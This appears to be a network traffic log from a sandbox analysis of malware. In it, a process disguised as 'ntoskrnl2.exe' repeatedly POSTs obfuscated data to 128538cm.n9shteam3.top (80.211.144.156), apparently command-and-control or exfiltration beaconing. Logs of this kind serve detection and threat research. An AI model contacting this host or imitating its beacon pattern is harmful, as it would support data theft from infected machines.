                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:01.009216070 CEST | 1028 | OUT | Data: request body (1028 bytes)
                                                            Sep 2, 2024 13:34:01.319756985 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:01.447962999 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            22 | 192.168.2.6 | 49765 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:01.578176022 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:01.931812048 CEST | 1028 | OUT | Data: request body (1028 bytes)
                                                            Sep 2, 2024 13:34:02.252561092 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:02.384099960 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            23 | 192.168.2.6 | 49766 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:02.519371986 CEST | 346 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:02.886218071 CEST | 1028 | OUT | Data: request body (1028 bytes)
                                                            Sep 2, 2024 13:34:03.164361000 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:03.369221926 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:02 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            24 | 192.168.2.6 | 49768 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:04.164904118 CEST | 346 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:04.509399891 CEST | 1028 | OUT | Data: request body (1028 bytes)
                                                            Sep 2, 2024 13:34:04.831409931 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:05.045439959 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            25 | 192.168.2.6 | 49769 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:05.175544024 CEST | 346 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:05.525038958 CEST | 1028 | OUT | Data: request body (1028 bytes)
                                                            Sep 2, 2024 13:34:05.827228069 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:05.953397989 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            26 | 192.168.2.6 | 49770 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:06.517075062 CEST | 346 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:06.868585110 CEST | 1340 | OUT | Data: request body (1340 bytes)
                                                            Sep 2, 2024 13:34:07.171248913 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:07.389738083 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            27 | 192.168.2.6 | 49771 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:06.575123072 CEST | 346 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:06.931066036 CEST | 1028 | OUT | Data: request body (1028 bytes)
                                                            Sep 2, 2024 13:34:07.213680983 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:07.337285995 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            28 | 192.168.2.6 | 49773 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:07.581300974 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:07.931277990 CEST | 1028 | OUT | Data: request body (1028 bytes)
                                                            Sep 2, 2024 13:34:08.233108997 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:08.361296892 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            29 | 192.168.2.6 | 49774 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:08.521495104 CEST | 346 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:08.872854948 CEST | 1028 | OUT | Data: request body (1028 bytes)
                                                            Sep 2, 2024 13:34:09.163899899 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:09.292871952 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.64977680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:09.742089987 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
Sep 2, 2024 13:34:10.087376118 CEST | 1028 | OUT | Data: request body
Sep 2, 2024 13:34:10.383903027 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:34:10.508687973 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 11:34:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 31 56 59 5a
Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 49777 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:34:11.510080099 CEST | 346 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1028
Expect: 100-continue
Connection: Keep-Alive
Sep 2, 2024 13:34:11.869126081 CEST | 1028 | OUT | Data: request body
Sep 2, 2024 13:34:12.163619041 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:34:12.290849924 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 11:34:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 31 56 59 5a
Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 49778 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:34:12.408005953 CEST | 346 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1340
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 49779 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:34:12.464140892 CEST | 346 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1024
Expect: 100-continue
Connection: Keep-Alive
Sep 2, 2024 13:34:12.821892023 CEST | 1024 | OUT | Data: request body
Sep 2, 2024 13:34:13.129128933 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:34:13.334731102 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 11:34:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 31 56 59 5a
Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 49781 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:34:13.735207081 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1028
Expect: 100-continue
Sep 2, 2024 13:34:14.152096987 CEST | 1028 | OUT | Data: request body
Sep 2, 2024 13:34:14.400244951 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:34:14.608207941 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 11:34:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 31 56 59 5a
Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 49782 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:34:14.768434048 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1028
Expect: 100-continue
Sep 2, 2024 13:34:15.118554115 CEST | 1028 | OUT | Data: request body
Sep 2, 2024 13:34:15.414674044 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:34:15.541254997 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 11:34:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 31 56 59 5a
Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 49783 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:34:15.695557117 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1028
Expect: 100-continue
Sep 2, 2024 13:34:16.040728092 CEST | 1028 | OUT | Data: request body
Sep 2, 2024 13:34:16.370728016 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:34:16.501729012 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 11:34:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 31 56 59 5a
Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 49784 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:34:16.689224958 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1028
Expect: 100-continue
Sep 2, 2024 13:34:17.040508986 CEST | 1028 | OUT | Data: request body
Sep 2, 2024 13:34:17.342374086 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:34:17.466954947 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 11:34:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 31 56 59 5a
Data Ascii: 1VYZ
Sep 2, 2024 13:34:17.490564108 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1340
Expect: 100-continue
Sep 2, 2024 13:34:17.709374905 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:34:17.709600925 CEST | 1340 | OUT | Data: request body
Sep 2, 2024 13:34:18.018712044 CEST | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 11:34:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Data: response body


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 49785 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:34:17.621836901 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1028
Expect: 100-continue
Sep 2, 2024 13:34:17.977956057 CEST | 1028 | OUT | Data: request body
Sep 2, 2024 13:34:18.266612053 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:34:18.473316908 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 11:34:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 31 56 59 5a
Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 49786 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:34:18.785686016 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1024
Expect: 100-continue
Sep 2, 2024 13:34:19.134208918 CEST | 1024 | OUT | Data: request body
Sep 2, 2024 13:34:19.431430101 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:34:19.557398081 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 11:34:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 31 56 59 5a
Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 49787 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:34:19.978192091 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1028
Expect: 100-continue
Sep 2, 2024 13:34:20.337307930 CEST | 1028 | OUT | Data: request body
Sep 2, 2024 13:34:20.614392042 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:34:20.737283945 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Sep 2024 11:34:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 31 56 59 5a
Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 49788 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:34:20.876718998 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 128538cm.n9shteam3.top
Content-Length: 1028
Expect: 100-continue
Sep 2, 2024 13:34:21.228434086 CEST | 1028 | OUT | Data: request body
                                                            Sep 2, 2024 13:34:21.525141001 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:21.737664938 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            42 | 192.168.2.6 | 49789 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:21.878649950 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:22.228097916 CEST | 1028 | OUT | Data Raw: 50 54 5f 52 5e 44 5c 51 5b 5f 56 5a 57 54 50 53 55 5b 5e 46 50 5a 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PT_R^D\Q[_VZWTPSU[^FPZZ\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$0)^<;+Y'T%[3>_+([84<0!V*80Q)' Y*2:X-%^./]+
                                                            Sep 2, 2024 13:34:22.527647972 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:22.653923035 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            43 | 192.168.2.6 | 49790 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:34:23.595801115 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1312
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:23.946706057 CEST | 1312 | OUT | Data Raw: 55 5f 5a 51 5e 40 59 56 5b 5f 56 5a 57 5c 50 5f 55 5a 5e 40 50 5a 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U_ZQ^@YV[_VZW\P_UZ^@PZZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$1<^4'2$-&Y<-8^, &/%U?(=';?">.%^./]+,
                                                            Sep 2, 2024 13:34:24.259706974 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:24.499011040 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0b 23 42 2f 55 31 38 23 07 29 5f 2e 5b 28 03 3b 1d 3a 11 23 00 27 39 01 5a 2b 32 26 08 31 39 00 05 3d 02 08 01 2b 32 00 0f 21 24 20 5b 03 1f 25 16 20 22 08 1e 26 28 3e 01 30 09 2d 00 36 37 0d 05 3e 03 26 51 30 2e 38 11 37 1f 31 0c 2d 3e 31 0e 31 16 05 06 3a 3c 3d 05 31 3e 2a 56 08 16 38 56 28 2f 26 5c 20 24 23 12 23 5e 3d 1f 34 35 24 0b 24 33 28 0e 27 14 29 54 27 00 3b 50 29 3d 2b 5f 24 29 31 5a 23 55 21 54 3a 39 24 50 2e 02 2d 56 03 30 57 53
